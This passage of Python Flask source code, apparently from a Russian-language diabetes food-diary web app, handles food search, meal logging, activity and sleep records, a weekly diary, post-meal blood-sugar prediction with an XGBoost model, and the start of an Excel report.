tb = tb.reindex(columns=["DateTime", "BG0", "GL", "carbo", "prot_b6h",
"types_food_n", "kr", "BMI"])
predict = list()
for i in range(len(tb['DateTime'])):
best_model = xgb.Booster()
best_model.load_model(model)
core_features = ["BG0", "gl", "carbo",
"prot_b6h", "types_food_n", "kr", "BMI"]
X_test = [tb.iloc[i, 1:7].values.tolist()]
predicted = best_model.predict(xgb.DMatrix(np.array(X_test)))
predict.append(predicted[0])
tb.insert(3, 'Предсказанный сахар после', predict, True)
date3 = list()
time3 = list()
tb['Прием пищи'] = tb['types_food_n']
for i in range(len(tb['DateTime'])):
date3.append(tb['DateTime'][i].strftime('%d.%m.%Y'))
time3.append(tb['DateTime'][i].strftime('%H:%M'))
if tb['Прием пищи'][i] == 1:
tb['Прием пищи'][i] = 'Завтрак'
elif tb['Прием пищи'][i] == 2:
tb['Прием пищи'][i] = 'Обед'
elif tb['Прием пищи'][i] == 3:
tb['Прием пищи'][i] = 'Ужин'
else:
tb['Прием пищи'][i] = 'Перекус'
tb.insert(0, 'Дата', date3, True)
tb.insert(1, 'Время', time3, True)
tb = tb.drop(['DateTime'], axis=1)
tb = tb.drop(['types_food_n'], axis=1)
tb['Сахар до'] = tb['BG0']
tb = tb.drop(['BG0'], axis=1)
tb['Гликемическая нагрузка'] = tb['GL']
tb = tb.drop(['GL'], axis=1)
tb = tb.drop(['carbo'], axis=1)
tb = tb.drop(['prot_b6h'], axis=1)
tb = tb.drop(['kr'], axis=1)
tb = tb.drop(["BMI"], axis=1)
tb = tb[['Дата', 'Время', 'Прием пищи', 'Сахар до',
'Предсказанный сахар после', 'Гликемическая нагрузка']]
mask1 = (tb['Дата'] == ddmmyy) & (tb['Время'] == jsoninfo['Time'])
BG1 = tb.loc[mask1]['Предсказанный сахар после'].aggregate(np.sum)
if (BG1 > 0.1)&(BG1 < 7):
messag_e = 'УСК после еды в норме'
elif BG1 < 0.1:
messag_e = ''
else:
messag_e = 'УСК после еды превысит норму'
list2 = jsonify({"BG1": messag_e})
response = make_response(list2, 200)
return response
@app.route('/search_page')
@login_required
def search_page():
# Search page
return render_template("searching.html")
@app.route('/searchlink/<string:search_string>')
@login_required
def searchlink(search_string):
# Handles the 'select category' dropdown menu
path = os.path.dirname(os.path.abspath(__file__))
db_3 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_3)
cur = con.cursor()
cur.execute("""SELECT name,_id
FROM food WHERE category LIKE ?""", ('%{}%'.format(search_string),))
result = cur.fetchall()
list1 = pd.DataFrame(result, columns=['name','id'])
list2 = list()
for i in range(len(list1['name'])):
cur.execute("""SELECT receipt,name
FROM recipes WHERE name LIKE ?""", (list1['name'][i],))
receipt = cur.fetchall()
try:
list2.append(receipt[0])
except IndexError:
list2.append(('',''))
con.close()
list2 = pd.DataFrame(list2, columns=['receipt','name'])
lis_t = pd.merge(left=list1, right=list2, on='name', how='left')
lis_t = lis_t.replace(np.nan, '', regex=True)
len1 = len(lis_t['receipt'])
return render_template('searching_add.html', name=lis_t['name'], receipt=lis_t['receipt'],
id=lis_t['id'], len=len1)
@app.route('/search', methods=['GET', 'POST'])
@login_required
def search():
# Core feature of the site: searching the database
if request.method == 'POST':
search_string = request.form['input_query']
search_string = search_string.capitalize()
path = os.path.dirname(os.path.abspath(__file__))
db_4 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_4)
cur = con.cursor()
cur.execute(""" SELECT category FROM foodGroups""")
category_a = cur.fetchall()
if (request.form['input_query'],) in category_a:
cur.execute('''SELECT name,_id FROM food
WHERE category LIKE ?''', ('%{}%'.format(search_string),))
result = cur.fetchall()
list1 = pd.DataFrame(result, columns=['name','id'])
list2 = list()
for i in range(len(list1['name'])):
cur.execute("""SELECT receipt,name
FROM recipes WHERE name LIKE ?""", (list1['name'][i],))
receipt = cur.fetchall()
try:
list2.append(receipt[0])
except IndexError:
list2.append(('',''))
list2 = pd.DataFrame(list2, columns=['receipt','name'])
lis_t = pd.merge(left=list1, right=list2, on='name', how='left')
lis_t = lis_t.replace(np.nan, '', regex=True)
len1 = len(lis_t['receipt'])
else:
cur.execute('''SELECT name,_id FROM food
WHERE name LIKE ?
GROUP BY name''', ('%{}%'.format(search_string),))
result = cur.fetchall()
list1 = pd.DataFrame(result, columns=['name','id'])
list2 = list()
for i in range(len(list1['name'])):
cur.execute("""SELECT receipt,name
FROM recipes WHERE name LIKE ?""", (list1['name'][i],))
receipt = cur.fetchall()
try:
list2.append(receipt[0])
except IndexError:
list2.append(('',''))
list2 = pd.DataFrame(list2, columns=['receipt','name'])
lis_t = pd.merge(left=list1, right=list2, on='name', how='left')
lis_t = lis_t.replace(np.nan, '', regex=True)
len1 = len(lis_t['receipt'])
con.close()
return render_template('searching_add.html', name=lis_t['name'], receipt=lis_t['receipt'],
id=lis_t['id'], len=len1)
@app.route('/favourites', methods=['POST', 'GET'])
@login_required
def favour():
# Add dishes to the preliminary (basket) list
if request.method == 'POST':
L1 = request.form.getlist('row')
libra = request.form['libra']
path = os.path.dirname(os.path.abspath(__file__))
db_5 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_5)
cur = con.cursor()
for i in range(len(L1)):
cur.execute(f"""INSERT INTO basket (user_id, food, libra)
VALUES (?,?,?)""",
(session['user_id'], L1[i], libra))
con.commit()
con.close()
return redirect(url_for('news'))
@app.route('/favourites_dell', methods=['POST', 'GET'])
@login_required
def favour_dell():
# Remove erroneous entries from the preliminary (basket) list
if request.method == 'POST':
flist = request.form.getlist('row')
food = []
libra = []
for i in range(len(flist)):
flist[i] = flist[i].split('//')
food.append(flist[i][0])
libra.append(flist[i][1])
for i in range(len(food)):
path = os.path.dirname(os.path.abspath(__file__))
db_6 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_6)
cur = con.cursor()
cur.execute("""DELETE FROM basket WHERE user_id = ? AND food = ?
AND libra = ?""",
(session['user_id'], food[i], libra[i]))
con.commit()
con.close()
return redirect(url_for('news'))
@app.route('/favourites_add', methods=['POST', 'GET'])
@login_required
def favour_add():
# Add dishes to the main database and clear the temporary basket list
if request.method == 'POST':
brf1 = datetime.time(7, 0)
brf2 = datetime.time(11, 30)
obed1 = datetime.time(12, 0)
obed2 = datetime.time(15, 0)
ujin1 = datetime.time(18, 0)
ujin2 = datetime.time(22, 0)
now = datetime.datetime.now().time()
time = request.form['timer']
if time == "":
x = datetime.datetime.now().time()
time = x.strftime("%R")
else:
x = datetime.datetime.strptime(time, "%H:%M")
time = x.strftime("%R")
date = request.form['calendar']
if date == "":
y = datetime.datetime.today().date()
date = y.strftime("%d.%m.%Y")
week_day = y.strftime("%A")
else:
y = datetime.datetime.strptime(date, "%Y-%m-%d")
y = y.date()
date = y.strftime("%d.%m.%Y")
week_day = y.strftime("%A")
if week_day == 'Monday':
week_day = 'Понедельник'
elif week_day == 'Tuesday':
week_day = 'Вторник'
elif week_day == 'Wednesday':
week_day = 'Среда'
elif week_day == 'Thursday':
week_day = 'Четверг'
elif week_day == 'Friday':
week_day = 'Пятница'
elif week_day == 'Saturday':
week_day = 'Суббота'
else:
week_day = 'Воскресенье'
typ = request.form['food_type']
if typ == "Авто":
if brf1 < now < brf2:
typ = "Завтрак"
elif obed1 < now < obed2:
typ = "Обед"
elif ujin1 < now < ujin2:
typ = "Ужин"
else:
typ = "Перекус"
path = os.path.dirname(os.path.abspath(__file__))
db_7 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_7)
cur = con.cursor()
# Fetch the names and gram amounts from the temporary basket
cur.execute("""SELECT food FROM basket WHERE user_id = ?""",
(session['user_id'],))
L1 = cur.fetchall()
cur.execute("""SELECT libra FROM basket WHERE user_id = ?""",
(session['user_id'],))
libra = cur.fetchall()
BG0 = request.form['sug']
# Fetch all nutrient parameters needed for the diet
elem1 = ['prot', 'carbo', 'fat', 'ec', 'water', 'mds', 'kr',
'pv', 'ok', 'zola', 'na', 'k', 'ca', 'mg', 'p',
'fe', 'a', 'kar', 're', 'b1', 'b2', 'rr', 'c', 'hol',
'nzhk', 'ne', 'te', 'gi']
elem2 = ['prot', 'carbo', 'fat', 'energy', 'water', 'mds', 'kr',
'pv', 'ok', 'zola', 'na', 'k', 'ca', 'mg', 'p', 'fe', 'a',
'kar', 're', 'b1', 'b2', 'rr', 'c', 'hol', 'nzhk', 'ne', 'te',
'gi']
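# elem1 lists the column names in the food table, elem2 the matching columns in
# favourites; the two only differ in 'ec' -> 'energy'.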
for i in range(len(L1)):
cur.execute("""INSERT INTO favourites
(user_id,week_day,date,time,type,food,libra, BG0)
VALUES (?,?,?,?,?,?,?,?)""", (session['user_id'],
week_day, date, time,
typ,
L1[i][0],
libra[i][0],
BG0))
for elem, elem3 in zip(elem1, elem2):
cur.execute(f"""SELECT {elem} FROM food
WHERE name = ?""", (L1[i][0],))
elem = cur.fetchall()
if elem[0][0] is None:
elem00 = '0'
else:
elem00 = elem[0][0]
cur.execute(f"""UPDATE favourites SET {elem3} = {elem00}
WHERE user_id = ? AND week_day = ?
AND date = ?
AND time = ?
AND type = ? AND food = ? AND libra = ?""",
(session['user_id'], week_day, date, time, typ,
L1[i][0], libra[i][0]))
cur.execute(""" UPDATE favourites SET micr = '' """)
cur.execute("""DELETE FROM basket WHERE user_id = ?""",
(session['user_id'],))
con.commit()
con.close()
return redirect(url_for('news'))
@app.route('/activity')
@login_required
def activity():
# Physical activity page
path = os.path.dirname(os.path.abspath(__file__))
db_8 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_8)
cur = con.cursor()
cur.execute("""SELECT date,time,min,type,user_id
FROM activity WHERE user_id = ?""", (session['user_id'],))
Act = cur.fetchall()
cur.execute("""SELECT date,time,hour,type,user_id
FROM sleep WHERE user_id = ?""", (session['user_id'],))
Sleep = cur.fetchall()
con.close()
return render_template('activity.html', Act=Act, Sleep=Sleep)
@app.route('/add_activity', methods=['POST'])
@login_required
def add_activity():
# Add an activity entry to the database
if request.method == 'POST':
date = datetime.datetime.strptime(request.form['calendar'], "%Y-%m-%d")
date = date.strftime("%d.%m.%Y")
min1 = request.form['min']
type1 = request.form['type1']
if type1 == '1':
type1 = 'Ходьба'
elif type1 == '2':
type1 = 'Зарядка'
elif type1 == '3':
type1 = 'Спорт'
elif type1 == '4':
type1 = 'Уборка в квартире'
elif type1 == '5':
type1 = 'Работа в огороде'
else:
type1 = 'Сон'
time1 = request.form['timer']
path = os.path.dirname(os.path.abspath(__file__))
db_9 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_9)
cur = con.cursor()
if type1 == 'Сон':
cur.execute("""INSERT INTO sleep (user_id,date,time,hour,type)
VALUES(?,?,?,?,?)""",
(session['user_id'], date, time1, min1, type1))
else:
cur.execute("""INSERT INTO activity
(user_id,date,time,min,type,empty)
VALUES(?,?,?,?,?,?)""",
(session['user_id'], date, time1, min1, type1, ' '))
con.commit()
con.close()
return redirect(url_for('activity'))
@app.route('/lk')
@login_required
def lk():
# Show dish names (diary for the current week)
session['username'] = current_user.username
session['user_id'] = current_user.id
session['date'] = datetime.datetime.today().date()
td = datetime.datetime.today().date()
if td.strftime("%A") == 'Monday':
delta = datetime.timedelta(0)
elif td.strftime("%A") == 'Tuesday':
delta = datetime.timedelta(1)
elif td.strftime("%A") == 'Wednesday':
delta = datetime.timedelta(2)
elif td.strftime("%A") == 'Thursday':
delta = datetime.timedelta(3)
elif td.strftime("%A") == 'Friday':
delta = datetime.timedelta(4)
elif td.strftime("%A") == 'Saturday':
delta = datetime.timedelta(5)
else:
delta = datetime.timedelta(6)
m = td - delta
M = m.strftime("%d.%m.%Y")
t = m + datetime.timedelta(1)
T = t.strftime("%d.%m.%Y")
w = m + datetime.timedelta(2)
W = w.strftime("%d.%m.%Y")
tr = m + datetime.timedelta(3)
TR = tr.strftime("%d.%m.%Y")
fr = m + datetime.timedelta(4)
FR = fr.strftime("%d.%m.%Y")
st = m + datetime.timedelta(5)
ST = st.strftime("%d.%m.%Y")
sd = m + datetime.timedelta(6)
SD = sd.strftime("%d.%m.%Y")
path = os.path.dirname(os.path.abspath(__file__))
db_10 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_10)
cur = con.cursor()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Понедельник',
'Завтрак', M))
MondayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""",
(session['user_id'], 'Понедельник', 'Обед', M))
MondayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""",
(session['user_id'], 'Понедельник', 'Ужин', M))
MondayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Понедельник',
'Перекус', M))
MondayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Завтрак', T))
TuesdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Обед', T))
TuesdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Ужин', T))
TuesdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Перекус', T))
TuesdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Завтрак', W))
WednesdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Обед', W))
WednesdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Ужин', W))
WednesdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Перекус', W))
WednesdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Завтрак', TR))
ThursdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Обед', TR))
ThursdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Ужин', TR))
ThursdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Перекус', TR))
ThursdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Пятница',
'Завтрак', FR))
FridayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Пятница',
'Обед', FR))
FridayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Пятница',
'Ужин', FR))
FridayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date= ?""", (session['user_id'], 'Пятница',
'Перекус', FR))
FridayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Завтрак', ST))
SaturdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Обед', ST))
SaturdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Ужин', ST))
SaturdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Перекус', ST))
SaturdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Завтрак', SD))
SundayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Обед', SD))
SundayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Ужин', SD))
SundayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Перекус', SD))
SundayP = cur.fetchall()
cur.execute("""SELECT date FROM full_days
WHERE id = ?""", (session['user_id'],))
date1 = cur.fetchall()
cur.execute("""SELECT doc FROM user
WHERE id = ?""", (session['user_id'],))
doc = cur.fetchall()
con.close()
list1 = dict()
for i in range(len(date1)):
list1.update({
f'{date1[i][0]}': '',
})
return render_template('bootstrap_lk.html', name=session['username'],
MondayZ=MondayZ,
MondayO=MondayO,
MondayY=MondayY,
MondayP=MondayP,
TuesdayZ=TuesdayZ,
TuesdayO=TuesdayO,
TuesdayY=TuesdayY,
TuesdayP=TuesdayP,
WednesdayZ=WednesdayZ,
WednesdayO=WednesdayO,
WednesdayY=WednesdayY,
WednesdayP=WednesdayP,
ThursdayZ=ThursdayZ,
ThursdayO=ThursdayO,
ThursdayY=ThursdayY,
ThursdayP=ThursdayP,
FridayZ=FridayZ,
FridayO=FridayO,
FridayY=FridayY,
FridayP=FridayP,
SaturdayZ=SaturdayZ,
SaturdayO=SaturdayO,
SaturdayY=SaturdayY,
SaturdayP=SaturdayP,
SundayZ=SundayZ,
SundayO=SundayO,
SundayY=SundayY,
SundayP=SundayP,
m=M,
t=T,
w=W,
tr=TR,
fr=FR,
st=ST,
sd=SD,
list1=list1,
doc=doc)
@app.route('/delete', methods=['POST'])
@login_required
def delete():
# Delete entries from the weekly food diary
if request.method == 'POST':
path = os.path.dirname(os.path.abspath(__file__))
db_11 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_11)
cur = con.cursor()
L = request.form.getlist('checked')
for i in range(len(L)):
L1 = L[i].split('//')
cur.execute('''DELETE FROM favourites WHERE food = ?
AND date = ?
AND time = ?
AND type = ?
AND user_id = ?''', (L1[0], L1[1], L1[2], L1[3],
session['user_id']))
cur.execute("""INSERT INTO deleted
(id, date, time, type, additional)
VALUES (?,?,?,?,?)""", (session['user_id'],
L1[1], L1[2],
'Прием пищи', L1[3]))
con.commit()
con.close()
return redirect(url_for('lk'))
@app.route('/remove', methods=['POST'])
@login_required
def remove():
# Delete entries from the weekly physical activity log
if request.method == 'POST':
path = os.path.dirname(os.path.abspath(__file__))
db_12 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_12)
cur = con.cursor()
L = request.form.getlist('selected')
for i in range(len(L)):
L1 = L[i].split('/')
if L1[3] != 'Сон':
cur.execute('''DELETE FROM activity WHERE date = ?
AND time = ?
AND min = ?
AND type = ?
AND user_id = ?''', (L1[0], L1[1], L1[2], L1[3],
session['user_id']))
cur.execute("""INSERT INTO deleted
(id,date,time,type,additional)
VALUES (?,?,?,?,?)""", (session["user_id"], L1[0],
L1[1],
'Физическая активность',
L1[3]+', '+L1[2]+' минут'))
else:
cur.execute('''DELETE FROM sleep WHERE date = ?
AND time = ?
AND hour = ?
AND type = ?
AND user_id = ?''', (L1[0], L1[1], L1[2], L1[3],
session['user_id']))
cur.execute("""INSERT INTO deleted
(id,date,time,type,additional)
VALUES (?,?,?,?,?)""", (session['user_id'], L1[0],
L1[1],
'Физическая активность',
L1[3]+', '+L1[2]+' часов'))
con.commit()
con.close()
return redirect(url_for('activity'))
@app.route('/arch')
@login_required
def arch():
# All-time archive
path = os.path.dirname(os.path.abspath(__file__))
db_13 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_13)
cur = con.cursor()
cur.execute(
"""SELECT date,time,type,food,libra,carbo,prot,fat,energy
FROM favourites WHERE user_id = ?""", (session['user_id'],))
L = cur.fetchall()
con.close()
tbl = pd.DataFrame(L, columns=['Дата', 'Время', 'Прием пищи', 'Продукты',
'Граммы', 'Углеводы', 'Белки', 'Жиры',
'ККал'])
tbl["Дата1"] = \
pd.to_datetime(tbl['Дата'], format='%d.%m.%Y')
tbl = tbl.sort_values(by="Дата1")
tbl = tbl.drop(["Дата1"], axis=1)
tbl = \
tbl.groupby(
['Дата',
'Время',
'Прием пищи']).agg({
"Продукты": lambda tags: "br".join(tags),
"Граммы": lambda tags: "br".join(tags),
"Углеводы": lambda tags: "br".join(tags),
"Белки": lambda tags: "br".join(tags),
"Жиры": lambda tags: "br".join(tags),
"ККал":
lambda tags: "br".join(tags)}).reset_index()
tbl = tbl.to_html(classes='table table-hover', index=False,
justify='left').replace('br', '</p>')
tbl = tbl.replace('<thead>', '<thead class="thead-light">')
tbl = tbl.replace('<table border="1" class="dataframe table table-hover">',
'<table class="table table-hover" aria-busy="false">')
tbl = tbl.replace('<th>index</th>',
'<th>Дата</th><th>Время</th><th>Прием пищи</th>')
tbl = tbl.replace('<th>Прием пищи</th>',
'<th style="white-space:nowrap;">Прием пищи</th>')
tbl = tbl.replace('<th>ККал</th>',
'<th style="white-space:nowrap;">ККал</th>')
tbl = tbl.replace('<td>', '<td class="align-middle">')
return render_template('arch.html', tbl=tbl)
@app.route('/days', methods=['GET', 'POST'])
@login_required
def days():
# List of complete days
if request.method == 'POST':
days1 = request.form.getlist("full_days")
day_s = days1[0].split(",")
path = os.path.dirname(os.path.abspath(__file__))
db_14 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_14)
cur = con.cursor()
for i in range(len(day_s)):
cur.execute("""INSERT INTO full_days (id,date) VALUES (?,?)""",
(session["user_id"], day_s[i]))
con.commit()
con.close()
return redirect(url_for('lk'))
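# do_tb() builds the per-user Excel report: a 'Приемы пищи' sheet with nutrients
# and per-day averages, a 'Предсказание сахара' sheet with the XGBoost predictions,
# an activity/sleep sheet, the list of complete days and the deleted entries.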
def do_tb():
global fio
# Fetch all required data from the database
path = os.path.dirname(os.path.abspath(__file__))
db_15 = os.path.join(path, 'diacompanion.db')
model = os.path.join(path, 'model.model')
con = sqlite3.connect(db_15)
cur = con.cursor()
cur.execute('''SELECT date,time,type,
food,libra,carbo,prot,
fat,energy,micr,water,mds,kr,pv,ok,
zola,na,k,ca,mg,p,fe,a,kar,re,b1,b2,
rr,c,hol,nzhk,ne,te,gi FROM favourites
WHERE user_id = ?''', (session['user_id'],))
L = cur.fetchall()
cur.execute('''SELECT date,time,min,type,empty FROM activity
WHERE user_id = ?''', (session['user_id'],))
L1 = cur.fetchall()
cur.execute('''SELECT date,time,hour FROM sleep
WHERE user_id =?''', (session['user_id'],))
L2 = cur.fetchall()
cur.execute('''SELECT DISTINCT date FROM
favourites WHERE user_id = ?''', (session['user_id'],))
date = cur.fetchall()
cur.execute("""SELECT DISTINCT date FROM full_days WHERE id = ?""",
(session["user_id"],))
full_days = cur.fetchall()
cur.execute("""SELECT*FROM deleted WHERE id = ?""",
(session["user_id"],))
deleted = cur.fetchall()
cur.execute("""SELECT date,time,type,BG0,gi,carbo,prot,kr FROM favourites
WHERE user_id = ?""", (session["user_id"],))
tb = cur.fetchall()
cur.execute('''SELECT username1 FROM user WHERE id = ?''',
(session['user_id'],))
fio = cur.fetchall()
cur.execute('''SELECT BMI FROM user WHERE id = ?''',
(session['user_id'],))
BMI0 = cur.fetchall()
BMI0 = BMI0[0][0]
con.close()
# Meals
food_weight = pd.DataFrame(L, columns=['Дата', 'Время', 'Прием пищи',
'Продукт', 'Масса, гр',
'Углеводы, гр',
'Белки, гр', 'Жиры, гр',
'ККал',
'Микроэлементы', 'Вода, в г',
'МДС, в г',
'Крахмал, в г', 'Пищ вол, в г',
'Орган кислота, в г',
'Зола, в г',
'Натрий, в мг', 'Калий, в мг',
'Кальций, в мг',
'Магний, в мг', 'Фосфор, в мг',
'Железо, в мг',
'Ретинол, в мкг',
'Каротин, в мкг',
'Ретин экв, в мкг',
'Тиамин, в мг',
'Рибофлавин, в мг',
'Ниацин, в мг',
'Аскорб кисл, в мг',
'Холестерин, в мг',
'НЖК, в г',
'Ниационвый эквивалент, в мг',
'Токоферол эквивалент, в мг',
'Гликемический индекс'])
list_of = ['Масса, гр', 'Углеводы, гр',
'Белки, гр', 'Жиры, гр',
'ККал', 'Микроэлементы', 'Вода, в г', 'МДС, в г',
'Крахмал, в г', 'Пищ вол, в г',
'Орган кислота, в г', 'Зола, в г',
'Натрий, в мг', 'Калий, в мг', 'Кальций, в мг',
'Магний, в мг', 'Фосфор, в мг', 'Железо, в мг',
'Ретинол, в мкг', 'Каротин, в мкг',
'Ретин экв, в мкг', 'Тиамин, в мг',
'Рибофлавин, в мг',
'Ниацин, в мг', 'Аскорб кисл, в мг',
'Холестерин, в мг',
'НЖК, в г',
'Ниационвый эквивалент, в мг',
'Токоферол эквивалент, в мг',
'Гликемический индекс']
for name1 in list_of:
for i in range(len(food_weight[name1])):
food_weight[name1][i] = \
food_weight[name1][i].replace('.', ',') + '\t'
a = \
food_weight.groupby(
['Дата',
'Время',
'Прием пищи']).agg({
"Продукт": lambda tags: '\n'.join(tags),
"Масса, гр": lambda tags: '\n'.join(tags),
"Углеводы, гр": lambda tags:
'\n'.join(tags),
"Белки, гр": lambda tags: '\n'.join(tags),
"Жиры, гр": lambda tags: '\n'.join(tags),
"ККал": lambda tags: '\n'.join(tags),
"Микроэлементы": lambda tags:
'\n'.join(tags),
"Вода, в г": lambda tags: '\n'.join(tags),
"МДС, в г": lambda tags: '\n'.join(tags),
"Крахмал, в г": lambda tags:
'\n'.join(tags),
"Пищ вол, в г": lambda tags:
'\n'.join(tags),
"Орган кислота, в г": lambda tags:
'\n'.join(tags),
"Зола, в г": lambda tags:
'\n'.join(tags),
"Натрий, в мг": lambda tags:
'\n'.join(tags),
"Калий, в мг": lambda tags:
'\n'.join(tags),
"Кальций, в мг": lambda tags:
'\n'.join(tags),
"Магний, в мг": lambda tags:
'\n'.join(tags),
"Фосфор, в мг": lambda tags:
'\n'.join(tags),
"Железо, в мг": lambda tags:
'\n'.join(tags),
"Ретинол, в мкг": lambda tags:
'\n'.join(tags),
"Каротин, в мкг": lambda tags:
'\n'.join(tags),
"Ретин экв, в мкг": lambda tags:
'\n'.join(tags),
"Тиамин, в мг": lambda tags:
'\n'.join(tags),
"Рибофлавин, в мг": lambda tags:
'\n'.join(tags),
"Ниацин, в мг": lambda tags:
'\n'.join(tags),
"Аскорб кисл, в мг": lambda tags:
'\n'.join(tags),
"Холестерин, в мг": lambda tags:
'\n'.join(tags),
"НЖК, в г": lambda tags:
'\n'.join(tags),
"Ниационвый эквивалент, в мг":
lambda tags: '\n'.join(tags),
"Токоферол эквивалент, в мг": lambda tags:
'\n'.join(tags),
"Гликемический индекс": lambda tags:
'\n'.join(tags)}).reset_index()
a["Дата1"] = \
pd.to_datetime(a['Дата'], format='%d.%m.%Y')
a = a.sort_values(by="Дата1")
a = a.drop(["Дата1"], axis=1)
# Number the dishes within each meal
for i1 in range(len(a['Продукт'])):
row = a['Продукт'][i1].split('\n')
for i in range(len(row)):
row[i] = f'{i + 1}. ' + row[i]
row = '\n'.join(row)
a['Продукт'][i1] = row
if len(a['Продукт']) == 0:
a = pd.DataFrame({'Дата': [''], 'Время': [''], 'Прием пищи': [''],
'Продукт': [''],
'Масса, гр': [''], 'Углеводы, гр': [''],
'Белки, гр': [''], 'Жиры, гр': [''],
'ККал': [''], 'Микроэлементы': [''],
'Вода, в г': [''], 'МДС, в г': [''],
'Крахмал, в г': [''], 'Пищ вол, в г': [''],
'Орган кислота, в г': [''],
'Зола, в г': [''], 'Натрий, в мг': [''],
'Калий, в мг': [''], 'Кальций, в мг': [''],
'Магний, в мг': [''], 'Фосфор, в мг': [''],
'Железо, в мг': [''], 'Ретинол, в мкг': [''],
'Каротин, в мкг': [''],
'Ретин экв, в мкг': [''],
'Тиамин, в мг': [''],
'Рибофлавин, в мг': [''], 'Ниацин, в мг': [''],
'Аскорб кисл, в мг': [''],
'Холестерин, в мг': [''], 'НЖК, в г': [''],
'Ниациновый эквивалент, в мг': [''],
'Токоферол эквивалент, в мг': [''],
'Гликемический индекс': ['']})
# Physical activity
